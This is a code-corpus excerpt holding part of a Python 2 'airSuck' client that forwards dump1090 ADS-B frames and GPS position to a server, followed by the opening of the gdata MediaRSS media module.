self.__startGpsWorker = asConfig['gps']
def __clientWatchdog(self):
"""
Master watchdog for the software client.
"""
# If we're connected to the server do the network checks.
if self.__serverConnected:
try:
# Check to see if we got data from dump1090.
if self.__lastSrvKeepalive >= self.__maxTimeSrv:
# Raise an exception.
raise IOError()
else:
# Increment our last entry.
self.__lastSrvKeepalive += 1
except IOError:
# Print the error message
logger.log("airSuck client watchdog: No keepalive for %s sec." %self.__maxTimeSrv)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
try:
# If we're connected.
if self.__serverConnected:
# If it's time to send the keepalive...
if self.__keepAliveTimer >= asConfig['keepaliveInterval']:
self.__keepAliveTimer = 0
if self.__keepAliveTimer == 0:
# Send the ping.
self.__send(self.__keepaliveJSON)
# Roll the keepalive timer.
self.__keepAliveTimer += 1
else:
# Reset the keepalive timer.
self.__keepAliveTimer = 0
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
# Set flag indicating whether we restarted because of the watchdog.
self.__watchdog1090Restart = False
# If we're running dump1090 handle timing it out.
if asConfig['dump1090Enabled']:
try:
# Check to see if we got data from dump1090.
if self.__lastADSB >= asConfig['dump1090Timeout']:
# Set watchdog restart flag.
self.__watchdog1090Restart = True
try:
# Kill dump1090
self.__proc1090.kill()
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
# Do nothing in the event it fails.
pass
# Raise an exception.
raise IOError()
else:
# Increment our last entry.
self.__lastADSB += 1
except IOError:
# Print the error message
logger.log("airSuck client watchdog: No data from dump1090 in %s sec." %asConfig['dump1090Timeout'])
try:
# Stop dump1090.
self.__proc1090.kill()
except:
# Do nothing, since it won't die nicely in some cases.
pass
finally:
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Restart our watchdog.
self.__myWatchdog = threading.Timer(1.0, self.__clientWatchdog)
self.__myWatchdog.start()
def __rxWatcher(self):
"""
Handle data received from our connected socket.
"""
# Flag the RX watcher as running
self.__rxWatcherRunning = True
# Loop guard
keepRunning = True
# Empty buffer string.
buff = ""
# While we're connected
while keepRunning:
try:
if self.__serverConnected == True:
# Get data.
buff = buff + self.__serverSock.recv(self.__rxBuffSz)
# If we have a newline, check our string and clear the buffer.
if buff.find("\n") > -1:
# If we got our JSON sentence reset the counter.
if buff == self.__keepaliveJSON + "\n":
self.__lastSrvKeepalive = 0
# If we're debugging log the things.
if asConfig['debug']:
logger.log("RX Keepalive: %s" %buff.strip())
# Reset data stuff.
buff = ""
# Attempt to send another keepalive.
self.__send(self.__keepaliveJSON)
except KeyboardInterrupt:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# Pass the exception up the chain.
raise KeyboardInterrupt
except SystemExit:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# pass the system exit exception up the stack.
raise SystemExit
except socket.timeout:
# If we time out do nothing. This is intentional.
pass
except Exception as e:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# We probably disconnected.
self.__serverConnected = False
if hasattr(e, 'errno'):
# If something goes wrong...
if e.errno == 32:
# We expect this to break this way sometimes.
raise IOError
else:
tb = traceback.format_exc()
logger.log("Exception in airSuck client rxWatcher:\n%s" %tb)
def __gpsWorker(self):
"""
This monitors GPSD for new data and updates our class-wide GPS vars.
"""
logger.log("Starting GPS worker...")
# We shouldn't start another GPS worker unless we have an exception.
self.__startGpsWorker = False
# If loading GPS worked...
canHasGps = False
try:
# If we have a gps set it up.
if asConfig['gps']:
self.__gps = gps(mode=WATCH_ENABLE)
# We're up!
canHasGps = True
try:
# Keep doing the things.
while(canHasGps):
# Get the "next" data...
self.__gps.next()
# Set our flag to let the system know we have an initial reading.
self.__gpsdData = True
# If we have an keyboard interrupt or system exit pass it on.
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except:
# Whatever else happens we want to log.
tb = traceback.format_exc()
logger.log("GPS worker blew up:\n%s" %tb)
# Dump message and wait 30 sec before clearing the fail flag.
logger.log("GPS worker sleeping 30 sec.")
time.sleep(30.0)
# Now we want to try and start again.
self.__startGpsWorker = True
except:
# Flag the gpsWorker thread as down.
self.__gpsWorkerRunning = False
self.__gpsWorkerFail = True
# Whatever else happens we want to log.
tb = traceback.format_exc()
logger.log("GPS worker blew up trying to activte the GPS:\n%s" %tb)
# Dump message and wait 30 sec before clearing the fail flag.
logger.log("GPS worker sleeping 30 sec.")
time.sleep(30.0)
# Now we want to try and start again.
self.__startGpsWorker = True
def __handleBackoffSrv(self, reset=False):
"""
Handle the backoff algorithm for reconnect delay. Accepts one optional argument, reset which is a boolean value. When reset is true, the backoff value is set back to 1. Returns no data.
"""
# If we're resetting the backoff set it to 1.0.
if reset:
self.__backoffSrv = 1.0
else:
# backoff ^ 2 for each iteration, ending at 4.0.
if self.__backoffSrv == 1.0:
self.__backoffSrv = 2.0
elif self.__backoffSrv == 2.0:
self.__backoffSrv = 4.0
return
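# Editor's note (illustrative, not in the original source): the backoff
# multiplier grows 1.0 -> 2.0 -> 4.0 and then stays at 4.0, so successive
# reconnect waits are reconnectDelay * 1, * 2, * 4, * 4, ... seconds until
# a successful connection resets it via __handleBackoffSrv(True).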
def __handleBackoff1090(self, reset=False):
"""
Handle the backoff algorithm for restart delay. Accepts one optional argument, reset which is a boolean value. When reset is true, the backoff value is set back to 1. Returns no data.
"""
# If we're resetting the backoff set it to 1.0.
if reset:
self.__backoff1090 = 1.0
else:
# backoff ^ 2 for each iteration, ending at 4.0.
if self.__backoff1090 == 1.0:
self.__backoff1090 = 2.0
elif self.__backoff1090 == 2.0:
self.__backoff1090 = 4.0
return
def __createBaseJSON(self):
"""
Creates a base JSON dictionary with information generic to all output.
"""
# Get the timestamp data.
dtsStr = str(datetime.datetime.utcnow())
# Create basic JSON dictionary.
retVal = {"clientName": asConfig['myName'], "dataOrigin": "airSuckClient", "dts": dtsStr}
# If we have gps support enabled...
if asConfig['gps']:
try:
# And if we have an initial reading plus a fix...
if self.__gpsdData and (self.__gps.fix.mode > 1):
# Update dictionary with GPS-related data.
retVal.update({"srcLat": self.__gps.fix.latitude, "srcLon": self.__gps.fix.longitude, "srcPosMeta": "gps"})
elif asConfig['reportPos']:
try:
# Update dictionary with GPS-related data.
retVal.update({"srcLat": float(asConfig['myPos'][0]), "srcLon": float(asConfig['myPos'][1]), "srcPosMeta": "manual"})
except:
logger.log("Improperly formatted position data from config.py.")
except:
tb = traceback.format_exc()
logger.log("Failed to get GPS position data:%s" %tb)
else:
# Handle GPS and related config data here.
if asConfig['reportPos']:
try:
# Update dictionary with GPS-related data.
retVal.update({"srcLat": float(asConfig['myPos'][0]), "srcLon": float(asConfig['myPos'][1]), "srcPosMeta": "manual"})
except:
logger.log("Improperly formatted position data from config.py.")
return retVal
def __verifyADSB(self, line):
"""
Verifies the formatting of a potential ADS-B frame. Returns True if the incoming data matches the regex, and False otherwise.
"""
# Assume we don't have good data by default.
retVal = False
# If we get a match...
if self.__re1090.match(line) is not None:
retVal = True
# If we're debugging log the things.
if asConfig['debug']:
logger.log("%s appears to be valid ADS-B." %line.strip())
# And return...
return retVal
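# Editor's note (illustrative, not in the original source): the regex above
# accepts dump1090's AVR-style frames, which begin with '*' or '@', contain
# hex digits, and end with ';'. For example, a line such as
#     *8D4840D6202CC371C32CE0576098;
# (a made-up but correctly formatted frame) would pass __verifyADSB.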
def __handleADSB(self, adsb):
"""
Wraps the ADS-B frame in JSON and queues it to be sent over the network.
"""
# Reset watchdog value.
self.__lastADSB = 0
# Build a dictionary with minimal information to send.
adsbDict = {"type": "airSSR", "data": adsb.strip()}
adsbDict.update(self.__createBaseJSON())
try:
# JSONify the dictionary.
adsbJSON = json.dumps(adsbDict)
except:
tb = traceback.format_exc()
logger.log("Exception occured creating JSON dictionary:\n%s" %tb)
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Enqueue: %s" %adsbJSON)
try:
# Put it on the queue.
clientQ.put(adsbJSON)
except:
tb = traceback.format_exc()
logger.log("dump1090 exception putting data on queue:\n%s" %tb)
return
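# Editor's note (illustrative, not in the original source): a queued
# sentence produced by __handleADSB combines the frame with the base
# fields from __createBaseJSON, e.g. (all values are placeholders):
#
#     {"type": "airSSR", "data": "*8D4840D6202CC371C32CE0576098;",
#      "clientName": "myClient", "dataOrigin": "airSuckClient",
#      "dts": "2015-01-01 00:00:00.000000",
#      "srcLat": 45.0, "srcLon": -122.0, "srcPosMeta": "gps"}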
def __stdoutWorker(self):
"""
Handle STDOUT output from dump1090.
"""
try:
# While we're still running...
while self.__proc1090.poll() is None:
# Grab the current line from STDOUT.
output = self.__proc1090.stdout.readline()
# If we're debugging dump the raw data
if asConfig['debug']:
logger.log("dump1090 stdout: %s" %output.strip())
# If it seems to be valid ADS-B then use it.
if self.__verifyADSB(output):
# If we're debugging...
if asConfig['debug']:
logger.log("Passing %s to __handleADSB." %output.strip())
self.__handleADSB(output)
# Get any 'straggling' output.
output = self.__proc1090.communicate()[0]
# If we're debugging dump the raw data
if asConfig['debug']:
logger.log("dump1090 stdout: %s" %output.strip())
# If it seems to be valid ADS-B then use it.
if self.__verifyADSB(output):
self.__handleADSB(output)
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except AttributeError:
# Just die nicely.
pass
except IOError:
# Just die nicely.
pass
def __stderrWorker(self):
"""
Handle STDERR output from dump1090.
"""
try:
# While we're still running...
while self.__proc1090.poll() is None:
# Get our STDERR output minus the newline char.
output = self.__proc1090.stderr.readline().replace("\n", "")
# If we're debugging...
if asConfig['debug']:
# If there's something on the line print it.
if output.strip() != "":
logger.log("dump1090 stderr: %s" %output)
# See if there's any data that wasn't picked up by our loop and print it, too.
output = self.__proc1090.communicate()[1].replace("\n", "")
# If we're debugging...
if asConfig['debug']:
if output.strip() != "":
logger.log("dump1090 stderr: %s" %output)
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except AttributeError:
# Just die nicely.
pass
except IOError:
# Just die nicely.
pass
def __connectServer(self):
"""
Connects to our host.
"""
# Create a new socket object.
self.__serverSock = socket.socket()
# Print message
logger.log("airSuck client connecting to %s:%s..." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Attempt to connect.
try:
# Connect up
self.__serverSock.connect((asConfig['connSrvHost'], asConfig['connSrvPort']))
logger.log("airSuck client connected.")
# We're connected now.
self.__serverConnected = True
# Reset the last keepalive counter.
self.__lastSrvKeepalive = 0
# Reset the watchdog state.
self.__watchdogFail = False
# Reset the backoff value
self.__handleBackoffSrv(True)
# Set 1 second timeout for blocking operations.
self.__serverSock.settimeout(1.0)
# The TX and RX watchdogs should be run every second.
self.__lastSrvKeepalive = 0
except KeyboardInterrupt:
# Pass it up the stack.
raise KeyboardInterrupt
except SystemExit:
# Pass it up the stack.
raise SystemExit
except socket.error, v:
# Connection refused.
if v[0] == errno.ECONNREFUSED:
logger.log("%s:%s refused connection." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Connection refused.
elif v[0] == errno.ECONNRESET:
logger.log("%s:%s reset connection." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Connection timeout.
elif v[0] == errno.ETIMEDOUT:
logger.log("Connection to %s:%s timed out." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# DNS or address error.
elif v[0] == -2:
logger.log("%s:%s DNS resolution failure or invalid address." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Something else happened.
else:
logger.log("%s:%s unhandled socket error: %s (%s)" %(asConfig['connSrvHost'], asConfig['connSrvPort'], v[1], v[0]))
# Set backoff delay.
boDelay = asConfig['reconnectDelay'] * self.__backoffSrv
# In the event our connect fails, try again after the configured delay
logger.log("airSuck client sleeping %s sec." %boDelay)
time.sleep(boDelay)
# Handle backoff.
self.__handleBackoffSrv()
except Exception as e:
# Dafuhq happened!?
tb = traceback.format_exc()
logger.log("airSuck client went boom connecting:\n%s" %tb)
# Set backoff delay.
boDelay = asConfig['reconnectDelay'] * self.__backoffSrv
# In the event our connect fails, try again after the configured delay
logger.log("airSuck client sleeping %s sec." %boDelay)
time.sleep(boDelay)
# Handle backoff.
self.__handleBackoffSrv()
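# Rough sketch of the reconnect back-off used above. The multiplier
# __backoffSrv is maintained by __handleBackoffSrv (defined elsewhere in
# this file); the numbers below are illustrative only:
#   reconnectDelay = 5, __backoffSrv = 1, 2, 4, ...
#   -> the client sleeps roughly 5, 10, 20, ... seconds between attempts.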
def __disconnectSouce(self):
"""
Disconnect from our host.
"""
logger.log("airSuck client disconnecting.")
# Clear the server connected flag.
self.__serverConnected = False
try:
# Close the connection.
self.__serverSock.close()
except:
tb = traceback.format_exc()
logger.log("airSuck client threw exception disconnecting.\n%s" %tb)
# Reset the last keepalive counter.
self.__lastSrvKeepalive = 0
def __send(self, data):
"""
Sends specified data to the airSuck destination server.
"""
# If we think we're connected try to send the infos. If not, do nothing.
if self.__serverConnected:
try:
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Netsend: %s" %data)
# Send the data to the server.
sendRes = self.__serverSock.send("%s\n" %data)
# If we weren't able to send anything...
if sendRes == 0:
# Cause a small explosion.
raise RuntimeError("Socked failed to send data. The connection is down.")
except:
tb = traceback.format_exc()
logger.log("airSuck client send exception:\n%s" %tb)
# Flag our connection as dead in the event we fail to send.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
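# Wire-format sketch: each call to __send() writes one JSON document framed
# by a trailing newline, e.g. (field names purely illustrative):
#   '{"type": "adsb", "data": "..."}\n'
# The receiving server is assumed to split the stream on "\n" to recover
# individual messages.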
def __queueWorker(self):
"""
Sends data on the queue to the remote server.
"""
self.__queueWorkerRunning = True
logger.log("airSuck client queue worker starting...")
while True:
try:
# Grab the JSON put on the queue
someJSON = clientQ.get()
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Dequeue: %s" %someJSON)
# And then send it over the network.
self.__send(someJSON)
except:
tb = traceback.format_exc()
logger.log("airSuck client queue worker caught exception reading from queue:\n%s" %tb)
# Flag the queue worker as down.
self.__queueWorkerRunning = False
def __kill1090(self):
"""
Kill the dump1090 process.
"""
logger.log("Attempting to kill dump1090...")
try:
if self.__proc1090.poll() is None:
self.__proc1090.kill()
logger.log("dump1090 killed.")
except AttributeError:
# The process is already dead.
logger.log("dump1090 not running.")
except:
# Unhandled exception.
tb = traceback.format_exc()
logger.log("Exception thrown while killing dump1090:\n%s" %tb)
# Flag dump1090 as down.
self.__dump1090Running = False
# Blank the object.
self.__proc1090 = None
def __worker(self):
"""
The main worker method that spins up the dump1090 executable and takes data from stdout.
"""
# We want to keep going.
keepRunning = True
# Start our watchdog process.
self.__myWatchdog = threading.Timer(1.0, self.__clientWatchdog)
self.__myWatchdog.start()
# Make sure we kill dump1090 when we shut down.
atexit.register(self.__kill1090)
# Keep running and restarting dump1090 unless the program is killed.
while keepRunning:
# If we have GPS enabled and there's no reason we shouldn't start it.
if asConfig['gps'] and self.__startGpsWorker:
try:
# Start the GPS worker thread.
gpsWorker = threading.Thread(target=self.__gpsWorker)
gpsWorker.daemon = True
gpsWorker.start()
except KeyboardInterrupt:
# Pass it on...
raise KeyboardInterrupt
except SystemExit:
# Pass it up.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client worker blew up starting the GPS worker:\n%s" %tb)
try:
# If we're supposed to keep running and the server is not connected, try to connect.
if keepRunning and (not self.__serverConnected):
self.__connectServer()
except KeyboardInterrupt:
# Pass it on...
raise KeyboardInterrupt
except SystemExit:
# Pass it up.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client worker blew up:\n%s" %tb)
self.__disconnectSouce()
try:
# If the RX watcher is not running
if (not self.__rxWatcherRunning):
# Start the RX watcher...
rxListener = threading.Thread(target=self.__rxWatcher)
rxListener.daemon = True
rxListener.start()
except KeyboardInterrupt:
# Stop looping.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# Raise the keyboard interrupt.
raise KeyboardInterrupt
except SystemExit:
# Stop looping.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# Pass the exception up the chain to our runner.
raise SystemExit
except:
# Log the exception
tb = traceback.format_exc()
logger.log("airSuck client rxListener blew up:\n%s" %tb)
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
try:
# If the queue worker isn't running...
if (not self.__queueWorkerRunning):
# Start our queue worker.
queueThread = threading.Thread(target=self.__queueWorker)
queueThread.daemon = True
queueThread.start()
except KeyboardInterrupt:
# Pass the exception up the chain to our runner.
raise KeyboardInterrupt
except SystemExit:
# Pass the exception up the chain to our runner.
raise SystemExit
except:
# Something else unknown happened.
tb = traceback.format_exc()
logger.log("dump1090 worker threw exception:\n%s" %tb)
try:
# Make sure Dump1090 is supposed to start, and that we're supposed to keep it running.
if (asConfig['dump1090Enabled']) and (not self.__dump1090Running):
# We don't have dump1090 started yet.
if self.__proc1090 is None:
# Start dump1090.
self.__proc1090 = Popen(self.popenCmd, stdout=PIPE, stderr=PIPE)
# If we have dump1090 working
if self.__proc1090 is not None:
logger.log("dump1090 started with PID %s." %self.__proc1090.pid)
# Flag dump1090 as running.
self.__dump1090Running = True
# Reset the backoff since we managed to start.
self.__handleBackoff1090(True)
# Start the watchdog after resetting lastADSB.
self.__lastADSB = 0
# Set up some threads to listen to the dump1090 output.
stdErrListener = threading.Thread(target=self.__stderrWorker)
stdOutListener = threading.Thread(target=self.__stdoutWorker)
stdErrListener.daemon = True
stdOutListener.daemon = True
stdErrListener.start()
stdOutListener.start()
# If we intend to restart dump1090 and we didn't kill dump1090 because of the watchdog...
if (not self.__dump1090Running) and (not self.__watchdog1090Restart):
# Handle backoff algorithm before it restarts.
boDly = self.__backoff1090 * asConfig['dump1090Delay']
logger.log("dump1090 sleeping %s sec before restart." %boDly)
time.sleep(boDly)
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Run the backoff handler.
self.__handleBackoff1090()
except KeyboardInterrupt:
# We don't want to keep running since we were killed.
keepRunning = False
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Pass the exception up the chain to our runner.
raise KeyboardInterrupt
except SystemExit:
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Raise the exception again.
raise SystemExit
except OSError:
# Dump an error since the OS reported dump1090 can't run.
logger.log("Unable to start dump1090. Please ensure dump1090 is at %s." %asConfig['dump1090Path'])
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Flag the thread for death.
keepRunning = False
# Attempt to kill dump1090
self.__kill1090()
except:
# Something else unknown happened.
tb = traceback.format_exc()
logger.log("dump1090 worker threw exception:\n%s" %tb)
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Attempt to kill dump1090
self.__kill1090()
try:
# Wait 0.1 seconds before looping.
time.sleep(0.1)
except KeyboardInterrupt:
# We don't want to keep running since we were killed.
keepRunning = False
# Raise the exception again.
raise KeyboardInterrupt
except SystemExit:
# We don't want to keep running since we were killed.
keepRunning = False
# Raise the exception again.
raise SystemExit
def __exitHandler(self, x=None, y=None):
"""
When we're instructed to exit these are the things we should do.
"""
logger.log("Caught signal that wants us to die.")
try:
# Try to kill dump1090.
self.__kill1090()
except:
pass
# Raise this exception to kill the program nicely.
sys.exit(0)
def run(self):
logger.log("Starting dump1090 worker.")
# NOTE:
# dump1090 has a bad habit of not dying on its own, so we implement signal
# handlers for the signals that result in the death of the client.
try:
signal.signal(signal.SIGTERM, self.__exitHandler)
except:
tb = traceback.format_exc()
logger.log("Death signal handler blew up setting signal handlers:\n%s" %tb)
try:
# Attempt to start the worker.
self.__worker()
except KeyboardInterrupt:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the keyboard interrupt up the chain to our main execution
raise KeyboardInterrupt
except SystemExit:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the exception up the stack.
raise SystemExit
except Exception as e:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the exception up the stack.
raise e
#######################
# Main execution body #
#######################
if __name__ == "__main__":
# Set up our global logger.
logger = asLog(asConfig['logMode'])
# Log startup message.
logger.log("Starting the airSuck client...")
# If we're debugging...
if asConfig['debug']:
# Dump our config.
logger.log("Configuration:\n%s" %asConfig)
# Set up our global objects.
asc = airSuckClient()
clientQ = Queue.Queue()
# Do we have at least one data source configured?
noDS = True
try:
# If the dump1090 client is enabled we have at least one data source.
if asConfig['dump1090Enabled']:
# Set the data source config flag.
noDS = False
# If the AIS client is enabled we have at least one data source.
if asConfig['aisEnabled']:
# Set the data source config flag.
noDS = False
# Start our comms thread.
threadClient = threading.Thread(target=asc.run)
threadClient.daemon = True
threadClient.start()
# If we didn't have a configured data source dump a helpful message.
if noDS:
logger.log("No data sources enabled for the airSuck client. Please enable at least one source in config.py by setting dump1090Enabled and/or aisEnabled to True.")
except KeyboardInterrupt:
logger.log("Keyboard interrupt.")
except SystemExit:
logger.log("System exit.")
except:
tb = traceback.format_exc()
logger.log("Unhandled exception in airSuck client:\n%s" %tb)
logger.log("Shutting down the airSuck client.") | gpl-3.0 |
bhargav2408/python-for-android | python-build/python-libs/gdata/src/gdata/media/__init__.py | 221 | 12093 | # -*-*- encoding: utf-8 -*-*-
#
# This is gdata.photos.media, implementing parts of the MediaRSS spec in gdata structures
#
# $Id: __init__.py 81 2007-10-03 14:41:42Z havard.gulldahl $
#
# Copyright 2007 Håvard Gulldahl
# Portions copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Essential attributes of photos in Google Photos/Picasa Web Albums are
expressed using elements from the `media' namespace, defined in the
MediaRSS specification[1].
Due to copyright issues, the elements herein are documented sparingly, please
consult with the Google Photos API Reference Guide[2], alternatively the
official MediaRSS specification[1] for details.
(If there is a version conflict between the two sources, stick to the
Google Photos API).
[1]: http://search.yahoo.com/mrss (version 1.1.1)
[2]: http://code.google.com/apis/picasaweb/reference.html#media_reference
Keep in mind that Google Photos only uses a subset of the MediaRSS elements
(and some of the attributes are trimmed down, too):
media:content
media:credit
media:description
media:group
media:keywords
media:thumbnail
media:title
"""
__author__ = u'[email protected]'# (Håvard Gulldahl)' #BUG: api chokes on non-ascii chars in __author__
__license__ = 'Apache License v2'
import atom
import gdata
MEDIA_NAMESPACE = 'http://search.yahoo.com/mrss/'
YOUTUBE_NAMESPACE = 'http://gdata.youtube.com/schemas/2007'
class MediaBaseElement(atom.AtomBase):
"""Base class for elements in the MEDIA_NAMESPACE.
To add new elements, you only need to add the element tag name to self._tag
"""
_tag = ''
_namespace = MEDIA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
def __init__(self, name=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Content(MediaBaseElement):
"""(attribute container) This element describes the original content,
e.g. an image or a video. There may be multiple Content elements
in a media:Group.
For example, a video may have a
<media:content medium="image"> element that specifies a JPEG
representation of the video, and a <media:content medium="video">
element that specifies the URL of the video itself.
Attributes:
url: non-ambiguous reference to online object
width: width of the object frame, in pixels
height: height of the object frame, in pixels
medium: one of `image' or `video', allowing the api user to quickly
determine the object's type
type: Internet media Type[1] (a.k.a. mime type) of the object -- a more
verbose way of determining the media type. To set the type member
in the constructor, use the content_type parameter.
(optional) fileSize: the size of the object, in bytes
[1]: http://en.wikipedia.org/wiki/Internet_media_type
"""
_tag = 'content'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
_attributes['width'] = 'width'
_attributes['height'] = 'height'
_attributes['medium'] = 'medium'
_attributes['type'] = 'type'
_attributes['fileSize'] = 'fileSize'
def __init__(self, url=None, width=None, height=None,
medium=None, content_type=None, fileSize=None, format=None,
extension_elements=None, extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.url = url
self.width = width
self.height = height
self.medium = medium
self.type = content_type
self.fileSize = fileSize
def ContentFromString(xml_string):
return atom.CreateClassFromXMLString(Content, xml_string)
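# Usage sketch (not part of the original module): build a Content element and
# round-trip it through its XML form. The attribute values are made up for
# illustration, and ToString() is assumed to be the usual atom.AtomBase helper.
#
#   photo = Content(url='http://example.com/photo.jpg', width='640',
#                   height='480', medium='image', content_type='image/jpeg')
#   xml_string = photo.ToString()
#   parsed = ContentFromString(xml_string)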
class Credit(MediaBaseElement):
"""(string) Contains the nickname of the user who created the content,
e.g. `Liz Bennet'.
This is a user-specified value that should be used when referring to
the user by name.
Note that none of the attributes from the MediaRSS spec are supported.
"""
_tag = 'credit'
def CreditFromString(xml_string):
return atom.CreateClassFromXMLString(Credit, xml_string)
class Description(MediaBaseElement):
"""(string) A description of the media object.
Either plain unicode text, or entity-encoded html (look at the `type'
attribute).
E.g `A set of photographs I took while vacationing in Italy.'
For `api' projections, the description is in plain text;
for `base' projections, the description is in HTML.
Attributes:
type: either `text' or `html'. To set the type member in the constructor,
use the description_type parameter.
"""
_tag = 'description'
_attributes = atom.AtomBase._attributes.copy()
_attributes['type'] = 'type'
def __init__(self, description_type=None,
extension_elements=None, extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.type = description_type
def DescriptionFromString(xml_string):
return atom.CreateClassFromXMLString(Description, xml_string)
class Keywords(MediaBaseElement):
"""(string) Lists the tags associated with the entry,
e.g `italy, vacation, sunset'.
Contains a comma-separated list of tags that have been added to the photo, or
all tags that have been added to photos in the album.
"""
_tag = 'keywords'
def KeywordsFromString(xml_string):
return atom.CreateClassFromXMLString(Keywords, xml_string)
class Thumbnail(MediaBaseElement):
"""(attributes) Contains the URL of a thumbnail of a photo or album cover.
There can be multiple <media:thumbnail> elements for a given <media:group>;
for example, a given item may have multiple thumbnails at different sizes.
Photos generally have two thumbnails at different sizes;
albums generally have one cropped thumbnail.
If the thumbsize parameter is set to the initial query, this element points
to thumbnails of the requested sizes; otherwise the thumbnails are the
default thumbnail size.
This element must not be confused with the <gphoto:thumbnail> element.
Attributes:
url: The URL of the thumbnail image.
height: The height of the thumbnail image, in pixels.
width: The width of the thumbnail image, in pixels.
"""
_tag = 'thumbnail'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
_attributes['width'] = 'width'
_attributes['height'] = 'height'
def __init__(self, url=None, width=None, height=None,
extension_attributes=None, text=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.url = url
self.width = width
self.height = height
def ThumbnailFromString(xml_string):
return atom.CreateClassFromXMLString(Thumbnail, xml_string)
class Title(MediaBaseElement):
"""(string) Contains the title of the entry's media content, in plain text.
Attributes:
type: Always set to plain. To set the type member in the constructor, use
the title_type parameter.
"""
_tag = 'title'
_attributes = atom.AtomBase._attributes.copy()
_attributes['type'] = 'type'
def __init__(self, title_type=None,
extension_attributes=None, text=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.type = title_type
def TitleFromString(xml_string):
return atom.CreateClassFromXMLString(Title, xml_string)
class Player(MediaBaseElement):
"""(string) Contains the embeddable player URL for the entry's media content
if the media is a video.
Attributes:
url: The URL of the embeddable player.
"""
_tag = 'player'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
def __init__(self, player_url=None,
extension_attributes=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.url= player_url
class Private(atom.AtomBase):
"""The YouTube Private element"""
_tag = 'private'
_namespace = YOUTUBE_NAMESPACE
class Duration(atom.AtomBase):
"""The YouTube Duration element"""
_tag = 'duration'
_namespace = YOUTUBE_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['seconds'] = 'seconds'
class Category(MediaBaseElement):
"""The mediagroup:category element"""
_tag = 'category'
_attributes = atom.AtomBase._attributes.copy()
_attributes['term'] = 'term'
_attributes['scheme'] = 'scheme'
_attributes['label'] = 'label'
def __init__(self, term=None, scheme=None, label=None, text=None,
extension_elements=None, extension_attributes=None):
"""Constructor for Category
Args:
term: str
scheme: str
label: str
text: str The text data in the this element
extension_elements: list A list of ExtensionElement instances
